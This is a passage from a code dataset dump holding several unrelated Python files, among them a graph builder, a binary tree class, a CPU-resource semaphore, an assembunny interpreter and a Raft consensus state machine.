segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)\n \n #Scale Test\n if len(scale) != 0:\n for i in range(len(scale)):\n s = scale[i]\n\n segment_name = video_name + '_scale_' + 'segment{}'.format(i)\n begin = max(0, s - 15)\n end = min(s + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.generate_gif(\n scale_gif_export_dir,\n segment_name,\n segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)","sub_path":"analysis/run_analyzer.py","file_name":"run_analyzer.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55753549","text":"a = 10\n\nif a > 5:\n print(\"a is greater than 5\")\nelif a > 3:\n print(\"a is less than 5, but greater than 3\")\nelse:\n print(\"a is less than 3\")\n\nb = [9, 6, 4, 2]\n\nfor x in b:\n print(x)\n\nc = True\ncnt = 0\nwhile c:\n print(\"Number %d\" % cnt)\n cnt+=1\n if cnt==10:\n c = False","sub_path":"controls.py","file_name":"controls.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614226283","text":"import os\nfrom time import sleep\n\ndef process(regs, pos, cmd_list):\n cmd, nums = cmd_list[pos]\n if cmd == \"cpy\":\n try:\n regs[nums[1]] = regs[nums[0]]\n except KeyError:\n regs[nums[1]] = int(nums[0])\n elif cmd == \"inc\":\n regs[nums[0]] += 1\n elif cmd == \"dec\":\n regs[nums[0]] -= 1\n elif cmd == \"jnz\":\n try:\n if regs[nums[0]] != 0:\n try:\n pos += int(nums[1]) - 1\n except ValueError:\n pos += regs[nums[1]]\n except KeyError:\n if int(nums[0]) != 0:\n try:\n pos += int(nums[1]) - 1\n except ValueError:\n pos+= regs[nums[1]]\n elif cmd == \"tgl\":\n i = regs[nums[0]] + pos\n try:\n old_cmd = cmd_list[i][0]\n except IndexError:\n pass\n else:\n if len(cmd_list[i][1]) == 1:\n if old_cmd == \"inc\":\n new_cmd = \"dec\"\n else:\n new_cmd = \"inc\"\n else:\n if old_cmd == \"jnz\":\n new_cmd = \"cpy\"\n else:\n new_cmd = \"jnz\"\n try:\n cmd_list[i][0] = new_cmd\n except IndexError:\n pass\n return pos, regs, cmd_list\n\n\ndef run(filename=\"input.txt\"):\n if filename.endswith(\"input.txt\"):\n regs = {'a':7, 'b':0, 'c':0, 'd':0}\n else:\n regs = {'a':0, 'b':0, 'c':0, 'd':0}\n with open(filename) as f:\n cmd_list = []\n for line in f:\n data = line.strip().split(\" \")\n cmd_list.append([data[0], data[1:]])\n pos = 0\n count = 0\n while pos < len(cmd_list):\n if int(count%1) == 0:\n sleep(2)\n os.system('clear')\n print(regs)\n for cmd,i in zip(cmd_list, range(len(cmd_list))):\n if i == pos:\n print(\"%s <--\" %cmd)\n else:\n print(\"%s\" %cmd)\n print('------------')\n pos, regs, cmd_list = process(regs, pos, cmd_list)\n pos += 1\n count += 1\n return regs['a']\n\nif __name__ == \"__main__\":\n print(run())\n","sub_path":"day23_ASM_V2/python/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"128969118","text":"# -*- coding: utf-8 -*-\n\"\"\"\n scap.template\n ~~~~~~~~~~~~~\n Module for working with file templates\n\"\"\"\n\nimport jinja2\nimport yaml\n\n\nclass Template(object):\n \"\"\"Adapter class that wraps jinja2 templates.\"\"\"\n def __init__(self, name, loader, erb_syntax=False, var_file=None,\n overrides=None):\n env_args = self._make_env_args(loader, erb_syntax)\n self._env = jinja2.Environment(**env_args)\n self._template = self._env.get_template(name)\n self._overrides = overrides\n self.var_file = var_file\n\n def _make_env_args(self, loader, erb_syntax):\n \"\"\"Generate properties to pass to the jinja template.\"\"\"\n loader = jinja2.DictLoader(loader)\n env_args = {'loader': loader}\n if erb_syntax:\n env_args.update({\n 'block_start_string': '<%',\n 'block_end_string': '%>',\n 'variable_start_string': '<%=',\n 'variable_end_string': '%>',\n 'comment_start_string': '<%#',\n 'comment_end_string': '%>',\n })\n\n return env_args\n\n def _get_file_vars(self):\n \"\"\"\n Load yaml var file if it exists.\n\n :return: dict variables for template use\n \"\"\"\n if not self.var_file:\n return {}\n\n with open(self.var_file, 'r') as variables:\n return yaml.load(variables.read())\n\n def render(self):\n \"\"\"\n Renders the templates specified by `self.name`.\n\n It uses the variables sourced from the import yaml\n file specified by `self.var_file`\n \"\"\"\n template_vars = self._get_file_vars()\n if self._overrides:\n overrides = self._overrides\n overrides.update(template_vars)\n template_vars = overrides\n return self._template.render(template_vars)\n","sub_path":"scap/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131915930","text":"# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\nimport os\n\nfrom pymor.defaults import defaults\n\n\n\nclass Version(object):\n\n def __init__(self, revstring):\n\n # special casing for debian versions like '0.1.3~precise~ppa9'\n if '~' in revstring:\n revstring = revstring[:revstring.index('~')]\n revstringparts = revstring.strip().split('-')\n if len(revstringparts) not in (1, 3):\n raise ValueError('Invalid revstring')\n if len(revstringparts) == 3:\n self.distance = int(revstringparts[1])\n self.shorthash = revstringparts[2]\n else:\n self.distance = 0\n self.shorthash = ''\n\n version_parts = revstringparts[0].split('.')\n if version_parts[-1].find('rc') >= 0:\n s = version_parts[-1].split('rc')\n if len(s) != 2:\n raise ValueError('Invalid revstring')\n version_parts[-1] = s[0]\n self.rc_number = int(s[1])\n else:\n self.rc_number = 0\n\n self.version = tuple(int(x) for x in version_parts)\n self.full_version = self.version + (self.rc_number,)\n\n def __eq__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.version == other.version and self.rc_number == other.rc_number and self.distance == other.distance\n\n def __lt__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.full_version < other.full_version\n\n def __gt__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.full_version > other.full_version\n\n def __str__(self):\n git_part = '-{}-{}'.format(self.distance, self.shorthash) if self.distance else ''\n version_part = '.'.join(map(str, self.version))\n rc_part = 'rc{}'.format(self.rc_number) if self.rc_number else ''\n return version_part + rc_part + git_part\n\n def __repr__(self):\n return 'Version({})'.format(str(self))\n\n\nNO_VERSIONSTRING = '0.0.0-0-0'\nNO_VERSION = Version(NO_VERSIONSTRING)\n\ntry:\n if 'PYMOR_DEB_VERSION' in os.environ:\n revstring = os.environ['PYMOR_DEB_VERSION']\n else:\n import pymor.version as _version\n revstring = getattr(_version, 'revstring', NO_VERSIONSTRING)\nexcept ImportError:\n import os.path\n import subprocess\n try:\n revstring = subprocess.check_output(['git', 'describe', '--tags', '--candidates', '20', '--match', '*.*.*'],\n cwd=os.path.dirname(__file__))\n except subprocess.CalledProcessError as e:\n import sys\n sys.stderr.write('''Warning: Could not determine current pyMOR version.\nFailed to import pymor.version and 'git describe --tags --candidates 20 --match *.*.*'\nreturned\n\n{}\n\n(return code: {})\n'''.format(e.output, e.returncode))\n revstring = NO_VERSIONSTRING\nfinally:\n version = Version(revstring)\n\nVERSION = version\nprint('Loading pymor version {}'.format(VERSION))\n","sub_path":"src/pymor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354930342","text":"#!/usr/bin/env python3\n\"\"\"\nBradley N. Miller, David L. Ranum\nProblem Solving with Algorithms and Data Structures using Python\nCopyright 2005\nUpdated by Roman Yasinovskyy, 2017\n\"\"\"\n\nimport operator\n\n\nclass BinaryTree:\n \"\"\"\n A recursive implementation of Binary Tree\n Using links and Nodes approach.\n\n Modified to allow for trees to be constructed from other trees\n rather than always creating a new tree in the insert_feft or insert_right\n \"\"\"\n\n def __init__(self, key):\n \"\"\"Create new tree\"\"\"\n self._key = key\n self._child_left = None\n self._child_right = None\n\n def get_root_val(self):\n \"\"\"Get root key value\"\"\"\n return self._key\n\n def set_root_val(self, key):\n \"\"\"Set root key value\"\"\"\n self._key = key\n\n root = property(get_root_val, set_root_val)\n\n def get_child_left(self):\n \"\"\"Get left child\"\"\"\n return self._child_left\n\n def set_child_left(self, node):\n \"\"\"Set left child\"\"\"\n self._child_left = node\n\n child_left = property(get_child_left, set_child_left)\n\n def get_child_right(self):\n \"\"\"Get right child\"\"\"\n return self._child_right\n\n def set_child_right(self, node):\n \"\"\"Set right child\"\"\"\n self._child_right = node\n\n child_right = property(get_child_right, set_child_right)\n\n def is_leaf(self):\n \"\"\"Check if a node is leaf\"\"\"\n return (not self._child_left) and (not self._child_right)\n\n def insert_left(self, new_node):\n \"\"\"Insert left subtree\"\"\"\n if isinstance(new_node, BinaryTree):\n new_subtree = new_node\n else:\n new_subtree = BinaryTree(new_node)\n\n if self._child_left:\n new_subtree.set_child_left(self._child_left)\n\n self._child_left = new_subtree\n\n def insert_right(self, new_node):\n \"\"\"Insert right subtree\"\"\"\n if isinstance(new_node, BinaryTree):\n new_subtree = new_node\n else:\n new_subtree = BinaryTree(new_node)\n\n if self._child_right:\n new_subtree.set_child_right(self._child_right)\n self._child_right = new_subtree\n\n def preorder(self):\n \"\"\"Pre-order tree traversal\"\"\"\n print(self._key, end=\" \")\n if self._child_left:\n self._child_left.preorder()\n if self._child_right:\n self._child_right.preorder()\n\n def inorder(self):\n \"\"\"In-order tree traversal\"\"\"\n if self._child_left:\n self._child_left.inorder()\n print(self._key, end=\" \")\n if self._child_right:\n self._child_right.inorder()\n\n def postorder(self):\n \"\"\"Post-order tree traversal\"\"\"\n if self._child_left:\n self._child_left.postorder()\n if self._child_right:\n self._child_right.postorder()\n print(self._key, end=\" \")\n\n def print_exp(self):\n \"\"\"Print an expression\"\"\"\n if self._child_left:\n print(\"(\", end=\" \")\n self._child_left.print_exp()\n print(self._key, end=\" \")\n if self._child_right:\n self._child_right.print_exp()\n print(\")\", end=\" \")\n\n def postorder_eval(self):\n \"\"\"Postorder evaluation\"\"\"\n operations = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"*\": operator.mul,\n \"/\": operator.truediv,\n }\n result_1 = None\n result_2 = None\n if self._child_left:\n result_1 = self._child_left.postorder_eval()\n if self._child_right:\n result_2 = self._child_right.postorder_eval()\n if result_1 and result_2:\n return operations[self._key](result_1, result_2)\n return self._key\n\n def height(self):\n \"\"\"Height of a tree\"\"\"\n if not self._key:\n return -1\n if self._child_left:\n height_left = self._child_left.height()\n else:\n height_left = -1\n\n if self._child_right:\n height_right = self._child_right.height()\n else:\n height_right = -1\n\n return 1 + max(height_left, height_right)\n\n def __len__(self):\n \"\"\"Size of a tree\"\"\"\n return self.size()\n\n def size(self):\n \"\"\"Count nodes in a tree\"\"\"\n if not self._key:\n return 0\n if self._child_left:\n children_left = self._child_left.size()\n else:\n children_left = 0\n\n if self._child_right:\n children_right = self._child_right.size()\n else:\n children_right = 0\n\n return 1 + children_left + children_right\n","sub_path":"src/lib/pythonds3/trees/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"233902801","text":"# Copyright 2019 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\nfrom contextlib import contextmanager\n\nimport attr\n\nfrom gevent.queue import Channel\n\n\n@attr.s\nclass CPUResource(object):\n \"\"\"Represents the machine's CPU as a limited resource.\n\n Each cpu (according to multiprocessing.cpu_count()) is worth 1000 millicores.\n Every subprocess that attempts to execute will first acquire its estimated\n amount of millicores before launching the subprocess. As soon as the\n subprocess completes, the held millicores are put back into the pool.\n\n Because recipes are finite both in runtime and number of distinct steps, this\n resource class unblocks other processes greedily. Whenever a subprocess\n completes, this analyzes all the outstanding subprocesses and will unblock\n whichever ones 'fit' in the now-freed resources. This is done in roughly FIFO\n order (i.e. if two tasks could potentially fit, the first one to block will be\n chosen over the second to unblock first).\n\n This is different than what's deemed 'fair' in a typical scheduling scenario,\n because in a mixed workload, heavy tasks could be forced to wait longer while\n small tasks use the CPU. However, because the recipes typically run with\n a hard finite timeout, it's better to use more of the CPU earlier than to\n potentially waste time waiting for small tasks to finish in order to schedule\n a heavy task earlier.\n \"\"\"\n _millicores_available = attr.ib()\n\n _millicores_max = attr.ib()\n @_millicores_max.default\n def _millicores_max_default(self):\n return self._millicores_available\n\n # List[Tuple[amount, Channel]]\n _waiters = attr.ib(factory=list)\n\n @contextmanager\n def cpu(self, amount, call_if_blocking):\n \"\"\"Block until `amount` of cpu, in millicores, is available.\n\n Requesting 0 cpu will never block or wait.\n Requesting < 0 cpu will raise ValueError.\n Requesting > _millicores_max will acquire the full CPU.\n\n Args:\n\n * amount (int) - The amount of millicores to acquire before yielding. Must\n be positive or will raise ValueError. If this exceeds the maximum amount\n of millicores available on the system, this will instead acquire the\n system maximum.\n * call_if_blocking (None|func(amount_blocked_on)) - `cpu` will invoke this\n callback if we would end up blocking before yielding. This callback\n should only be used for reporting/diagnostics (i.e. it shouldn't raise\n an exception.)\n\n Yields control once the requisite amount of cpu is available.\n \"\"\"\n if amount < 0:\n raise ValueError('negative cpu amount')\n\n if amount > self._millicores_max:\n amount = self._millicores_max\n\n if amount > 0 and (self._waiters or self._millicores_available < amount):\n # we need some amount of cores AND\n # someone else is already waiting, or there aren't enough cores left.\n if call_if_blocking:\n call_if_blocking(amount - self._millicores_available)\n wake_me = Channel()\n self._waiters.append((amount, wake_me))\n wake_me.get()\n # At this point the greenlet that woke us already reserved our cores for\n # us, and we're free to go.\n else:\n # Just directly take our cores.\n assert self._millicores_available >= amount\n self._millicores_available -= amount\n\n try:\n yield\n finally:\n self._millicores_available += amount\n # We just added some resource back to the pot. Try to wake as many others\n # as we can before proceeding.\n\n to_wake, to_keep = [], []\n for waiting_amount, chan in self._waiters:\n if waiting_amount <= self._millicores_available:\n to_wake.append(chan)\n self._millicores_available -= waiting_amount\n else:\n to_keep.append((waiting_amount, chan))\n self._waiters = to_keep\n for chan in to_wake:\n chan.put(None)\n","sub_path":"recipe_engine/internal/cpu_semaphore.py","file_name":"cpu_semaphore.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"252922862","text":"class Solution:\n def findRelativeRanks(self, nums: List[int]) -> List[str]:\n nums = [(num,i) for i,num in enumerate(nums)]\n sorted_nums = sorted(nums,reverse = True)\n pos = [0 for i in range(len(nums))]\n for i,element in enumerate(sorted_nums):\n idx = element[1]\n if i == 0:\n rank = \"Gold Medal\"\n elif i == 1:\n rank = \"Silver Medal\"\n elif i == 2:\n rank = \"Bronze Medal\"\n else:\n rank = str(i+1)\n \n pos[idx] = rank\n return pos\n \n \n","sub_path":"leetcode/relative-ranks.py","file_name":"relative-ranks.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305376722","text":"def match(s, p, h={}):\n \"\"\"\n Dynamic Programming\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n if h.get((s, p)): return h.get((s, p))\n\n if p == '' or s == '':\n h[(s, p)] = False\n return False\n\n if p == '*' or (p == '?' and len(s) <= 1):\n h[(s, p)] = True\n return True\n\n if len(s) == len(p) and len(s) == 1:\n if s == p:\n h[(s, p)] = True\n return True\n else:\n h[(s, p)] = False\n return False\n\n for i in range(len(p)):\n if s[i] == p[i]:\n return match(s[i+1:], p[i+1:], h)\n elif p[i] == '*':\n for j in range(i, len(s)):\n if match(s[j:], p[i+1:], h):\n return True\n elif p[i] == '?':\n return match(s[i+1:], p[i+1:], h)\n else:\n return False\n\n\nif __name__ == \"__main__\":\n h = {}\n print(match('aa', 'a', h));\n h = {}\n print(match('aa', '*', h))\n h = {}\n print(match('cb', '?a', h))\n h = {}\n print(match('adceb', '*a*b', h))\n h = {}\n print(match('acdcb', 'a*c?b', h))","sub_path":"source/44_wildcard_matching.py","file_name":"44_wildcard_matching.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282068644","text":"from floe.api import (parameter, MoleculeOutputPort, SourceCube, OEMolOStreamCube)\nfrom floe.api.orion import StreamingDataset, config_from_env, MultipartDatasetUploader\nfrom openeye import oechem\n# from floe.api.ports import BinaryMoleculeInputPort, MoleculeSerializerMixin\n# from floe.api.parameter import DataSetOutputParameter\n\n\nclass ProteinReader(SourceCube):\n title = \"Protein Reader Cube\"\n version = \"0.0.0\"\n classification = [[\"Protein Reader Cube\", \"OEChem\", \"Reader Cube\"]]\n tags = ['OEChem']\n description = \"\"\"\n A Protein Reader Cube \n Input:\n -------\n oechem.OEMCMol or - Streamed-in of the protein system\n The input file can be an .oeb, .oeb.gz, .pdb or a .mol2 file\n\n Output:\n -------\n oechem.OEMCMol - Emits the protein system\n \"\"\"\n\n success = MoleculeOutputPort(\"success\")\n\n data_in = parameter.DataSetInputParameter(\n \"data_in\",\n help_text=\"Protein to read in\",\n required=True,\n description=\"The Protein to read in\")\n\n limit = parameter.IntegerParameter(\n \"limit\",\n required=False)\n\n download_format = parameter.StringParameter(\n \"download_format\",\n choices=[\".oeb.gz\", \".oeb\", \".pdb\", \".mol2\", \".smi\"],\n required=False,\n default=\".oeb.gz\")\n\n protein_prefix = parameter.StringParameter(\n 'protein_prefix',\n default='PRT',\n help_text='The protein prefix name used to identify the protein')\n\n def begin(self):\n self.opt = vars(self.args)\n\n def __iter__(self):\n max_idx = self.args.limit\n if max_idx is not None:\n max_idx = int(max_idx)\n count = 0\n self.config = config_from_env()\n in_orion = self.config is not None\n if not in_orion:\n with oechem.oemolistream(str(self.args.data_in)) as ifs:\n for mol in ifs.GetOEMols():\n mol.SetTitle(self.opt['protein_prefix'])\n yield mol\n count += 1\n if max_idx is not None and count == max_idx:\n break\n else:\n stream = StreamingDataset(self.args.data_in,\n input_format=self.args.download_format)\n for mol in stream:\n mol.SetTitle(self.opt['protein_prefix'])\n yield mol\n count += 1\n if max_idx is not None and count == max_idx:\n break\n\n\n# class SimOutputCube(OEMolOStreamCube):\n# \"\"\"\n# A sink cube that writes molecules to a file\n# \"\"\"\n# classification = [[\"Output\"]]\n# title = \"Output Writer\"\n#\n# intake = BinaryMoleculeInputPort('intake')\n# data_out = DataSetOutputParameter('data_out',\n# required=True,\n# title='Name of Dataset to create',\n# description='The dataset to output')\n# backend = DataSetOutputParameter(\n# 'backend',\n# default=\"auto\",\n# choices=[\"db\", \"s3\", \"auto\"],\n# description=\"The Orion storage backend to use\")\n#\n# def begin(self):\n# self.in_orion = config_from_env() is not None\n# self.decoder = MoleculeSerializerMixin()\n# self.need_decode = not self.args.data_out.endswith(\".oeb.gz\")\n# if self.in_orion:\n# self.ofs = MultipartDatasetUploader(self.args.data_out,\n# tags=[self.name],\n# backend=self.args.backend)\n# elif self.need_decode:\n# self.ofs = oechem.oemolostream(str(self.args.data_out))\n# else:\n# self.ofs = open(str(self.args.data_out), 'wb')\n#\n# def write(self, mol, port):\n# if self.in_orion or not self.need_decode:\n# self.ofs.write(mol)\n# else:\n# oechem.OEWriteMolecule(self.ofs, self.decoder.decode(mol))\n#\n# def end(self):\n# if self.in_orion:\n# self.ofs.complete()\n# else:\n# self.ofs.close()","sub_path":"ComplexPrepCubes/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236715839","text":"from graph import Graph\nfrom vertex import Vertex\nfrom edge import Edge\n\ndef buildGraph(graphCommands, n):\n \"\"\" The buildGraph function takes a list of graph commands to interpret, and runs through the list executing their instructions.\n\n Args: graphCommands A list of graph commands to execute\n n A number to label the graph being built with\n\n The function first counts each type of command it is given and displays that, then it runs through the list and creates a second list of streamlined commands. Following that it builds the graph by instantiating an object and executing the relevant commands.\n\n \"\"\"\n commands = []\n commentCount = 0\n graphCount = 0\n vertexCount = 0\n edgeCount = 0\n\n print(\"Building graph\", str(n+1) + \".\")\n print(\"Number of commands:\", len(graphCommands))\n\n for command in graphCommands:\n if command[0] == '--':\n commentCount += 1\n elif command[0] == 'new':\n graphCount += 1\n elif command[0] == 'add':\n if command[1] == 'vertex':\n vertexCount += 1\n elif command[1] == 'edge':\n edgeCount += 1\n\n print(\"Comments:\", commentCount)\n print(\"Graphs:\", graphCount)\n print(\"Vertices:\", vertexCount)\n print(\"Edges:\", edgeCount, \"\\n\")\n\n for command in graphCommands:\n if command[0] == '--':\n continue\n elif command[0] == 'new':\n commands.append(['new'])\n elif command[0] == 'add':\n if command[1] == 'vertex':\n commands.append(['vertex', command[2]])\n elif command[1] == 'edge':\n commands.append(['edge', command[2], command[4], float(command[5])])\n else:\n print('Invalid command:', command[0], command[1])\n else:\n print('Invalid command:', command[0])\n\n\n graphObj = None\n\n for command in commands:\n if command[0] == '--':\n continue\n elif command[0] == 'new':\n graphObj = Graph(n + 1)\n elif command[0] == 'vertex':\n graphObj.addVertex(Vertex(command[1]))\n elif command[0] == 'edge':\n startVertex = graphObj.getVertex(command[1])\n endVertex = graphObj.getVertex(command[2])\n weight = float(command[3])\n graphObj.addEdge(Edge(startVertex, endVertex, weight))\n else:\n print('Invalid command:', command)\n\n\n if graphObj is None:\n print(\"No new graph created.\")\n else:\n return graphObj\n","sub_path":"Assignments/Assignment4/code/python/graphBuilder.py","file_name":"graphBuilder.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598498356","text":"\"\"\"\n Created by alexandra at 04.09.19 18:15\n Calculate topological invariant of a 1d insulator in 010 direction \n at high symmetry point Gamma, K or M \n\"\"\"\n\nfrom math import sin, cos, pi\nimport cmath\n\n\ndef q(k, d):\n \"\"\"Off diagonal element of flat hamiltonian in 010 direction\"\"\"\n lamb = sin(k)**2 + (cos(k) + h + d)**2\n return (\n 2 * sin(k) * (cos(k) + h + d)\n - 1j * (sin(k)**2 - (cos(k) + h + d)**2)\n ) / lamb\n\n\ndef invariant(kx, ky):\n delta = cos(kx) + cos(ky)\n q0 = q(0, delta)\n p = 0\n for idy in range(Nk - 1):\n ky = 2 * pi * (idy + 1) / (Nk - 1)\n q1 = q(ky, delta)\n p += -cmath.phase(q0.conjugate() * q1) / 2 / pi\n q0 = q1\n return p\n\n\nh = 1.5\nNk = 100\nprint(invariant(0, 0))\n","sub_path":"TopInvariant1D.py","file_name":"TopInvariant1D.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174245998","text":"# machine.py\n#\n# The Raft state machine\n\nfrom .message import RequestVote, RequestVoteResponse, AppendEntries, AppendEntriesResponse\n\nclass LogEntry:\n def __init__(self, term, entry):\n self.term = term\n self.entry = entry\n def __repr__(self):\n return f'LogEntry({self.term}, {self.entry})'\n def __eq__(self, other):\n return (self.term, self.entry) == (other.term, other.entry)\n\nclass RaftMachine:\n def __init__(self, control):\n self.control = control # All configuration/system dependent details in control\n\n self.term = 0 # Must be a persistent value (Eventually)\n self.state = Follower \n self.votedFor = None # Who voted for in current term\n\n self.log = [ ] # Persistent data. Part of controller?\n\n # Volatile state (on all servers)\n self.commitIndex = -1 # Highest log entry known to be committed\n self.lastApplied = -1 # Highest log entry applied to state machine\n\n # There is state that is initialized just on the leader (when becoming leader)\n self.reset_leader()\n\n # Transactions on the state machine. These represent actions that need to\n # result in persistent state and logged.\n def append_entries(self, previndex, prevterm, entries):\n assert all(isinstance(e, LogEntry) for e in entries)\n if previndex + 1 > len(self.log):\n return False\n if previndex >= 0 and self.log[previndex].term != prevterm:\n return False\n self.log[previndex+1:] = entries\n return True\n\n def update(self, name, value):\n setattr(self, name, value)\n \n def reset_leader(self):\n # On becoming leader, these values are reset.\n\n # Next index is the next log index to be sent on append_entries\n self.nextIndex = { peer: len(self.log) for peer in self.control.peers }\n\n # Match index is the highest known index for matching logs\n self.matchIndex = { peer: -1 for peer in self.control.peers }\n \n # Who voted for in current election\n self.votedFor = None\n\n # Generic dispatch for any message\n def handle_Message(self, msg):\n if msg.term > self.term:\n self.term = msg.term\n self.state = Follower\n getattr(self, f'handle_{type(msg).__name__}')(msg)\n\n # Different message types that could be received\n def handle_AppendEntries(self, msg):\n self.state.handle_AppendEntries(self, msg)\n\n def handle_AppendEntriesResponse(self, msg):\n if msg.term == self.term:\n self.state.handle_AppendEntriesResponse(self, msg)\n\n def handle_RequestVote(self, msg):\n self.state.handle_RequestVote(self, msg)\n\n def handle_RequestVoteResponse(self, msg):\n if msg.term == self.term:\n self.state.handle_RequestVoteResponse(self, msg)\n\n def handle_ElectionTimeout(self):\n self.state.handle_ElectionTimeout(self)\n\n def handle_LeaderTimeout(self):\n self.state.handle_LeaderTimeout(self)\n\n def send_AppendEntries(self):\n # Send an AppendEntries message to all peers\n for dest in self.control.peers:\n self.send_AppendEntry(dest)\n\n def send_AppendEntry(self, dest):\n # Send a single AppendEntry message to one server\n prevLogIndex = self.nextIndex[dest] - 1\n prevLogTerm = self.log[prevLogIndex].term if prevLogIndex >= 0 else -1\n self.control.send_message(\n AppendEntries(\n dest=dest,\n term=self.term,\n prevLogIndex=prevLogIndex,\n prevLogTerm=prevLogTerm,\n entries=self.log[prevLogIndex+1:],\n leaderCommit=self.commitIndex\n )\n )\n\nclass RaftState:\n @staticmethod\n def handle_AppendEntries(machine, msg):\n print('handle_AppendEntries not implemented')\n\n @staticmethod\n def handle_AppendEntriesResponse(machine, msg):\n print('handle_AppendEntriesResponse not implemented')\n\n @staticmethod\n def handle_RequestVote(machine, msg):\n if (msg.term < machine.term or \n (msg.term == machine.term and \n machine.votedFor is not None and\n machine.votedFor != msg.source)):\n machine.control.send_message(\n RequestVoteResponse(dest=msg.source,\n term=machine.term,\n voteGranted=False\n )\n )\n\n else: # This needs more work (there are issues with log being up to date)\n machine.votedFor = msg.source\n machine.control.send_message(\n RequestVoteResponse(dest=msg.source,\n term=machine.term,\n voteGranted=True\n )\n )\n machine.control.reset_election_timer()\n\n @staticmethod\n def handle_RequestVoteResponse(machine, msg):\n print('handle_RequestVoteResponse not implemented')\n\n @staticmethod\n def handle_ElectionTimeout(machine):\n print('handle_ElectionTimeout not implemented')\n\n @staticmethod\n def handle_LeaderTimeout(machine):\n print('handle_LeaderTimeout not implemented')\n\nclass Follower(RaftState):\n @staticmethod\n def handle_ElectionTimeout(machine):\n machine.state = Candidate\n machine.term += 1\n machine.votedFor = machine.control.id # I vote for myself\n machine.control.reset_election_timer()\n machine.votesGranted = 1\n\n # Send a RequestVote to all other servers\n for dest in machine.control.peers:\n machine.control.send_message(\n RequestVote(dest=dest,\n term=machine.term,\n lastLogIndex = len(machine.log) - 1,\n lastLogTerm = machine.log[len(machine.log)-1].term if machine.log else -1\n )\n )\n\n @staticmethod\n def handle_AppendEntries(machine, msg):\n logOk = (msg.prevLogIndex == -1 or (\n msg.prevLogIndex >= 0 and\n msg.prevLogIndex < len(machine.log) and\n msg.prevLogTerm == machine.log[msg.prevLogIndex].term\n )\n )\n if msg.term < machine.term or not logOk:\n # Failure\n machine.control.send_message(\n AppendEntriesResponse(\n dest=msg.source,\n term=machine.term,\n success=False,\n matchIndex=-1\n )\n )\n else:\n # Appending should work\n ok = machine.append_entries(msg.prevLogIndex,\n msg.prevLogTerm,\n msg.entries)\n \n assert ok\n machine.control.send_message(\n AppendEntriesResponse(\n dest=msg.source,\n term=machine.term,\n success=True,\n matchIndex=msg.prevLogIndex+len(msg.entries)\n )\n )\n\nclass Leader(RaftState):\n @staticmethod\n def handle_AppendEntriesResponse(machine, msg):\n # If the operation was successful, update leader settings for the follower\n if msg.success:\n machine.matchIndex[msg.source] = msg.matchIndex\n machine.nextIndex[msg.source] = msg.matchIndex+1\n\n # Check for consensus on log entries\n matches = sorted(machine.matchIndex.values())\n machine.commitIndex = matches[len(machine.matchIndex)//2]\n\n else:\n # It failed for this follower. Immediately retry with a\n # lower nextIndex value\n machine.nextIndex[msg.source] -= 1\n machine.send_AppendEntry(msg.source)\n\n @staticmethod\n def handle_LeaderTimeout(machine):\n # Must send an append entries message to all followers\n machine.send_AppendEntries()\n\n # Must reset the leader timeout\n machine.control.reset_leader_timeout()\n\n\nclass Candidate(RaftState):\n @staticmethod\n def handle_RequestVoteResponse(machine, msg):\n if msg.term < machine.term: # Ignore (out of date message)\n pass\n\n if msg.voteGranted:\n machine.votesGranted += 1\n if machine.votesGranted > (machine.control.nservers // 2):\n machine.state = Leader\n machine.reset_leader()\n # Upon leadership change, send an empty AppendEntries\n machine.send_AppendEntries()\n machine.control.reset_leader_timeout()\n \n @staticmethod\n def handle_ElectionTimeout(machine):\n # Oh well. Call a new election for myself\n Follower.handle_ElectionTimeout(machine)\n\n @staticmethod\n def handle_AppendEntries(machine, msg):\n if msg.term == machine.term:\n # Convert to follower and handle message\n machine.state = Follower\n 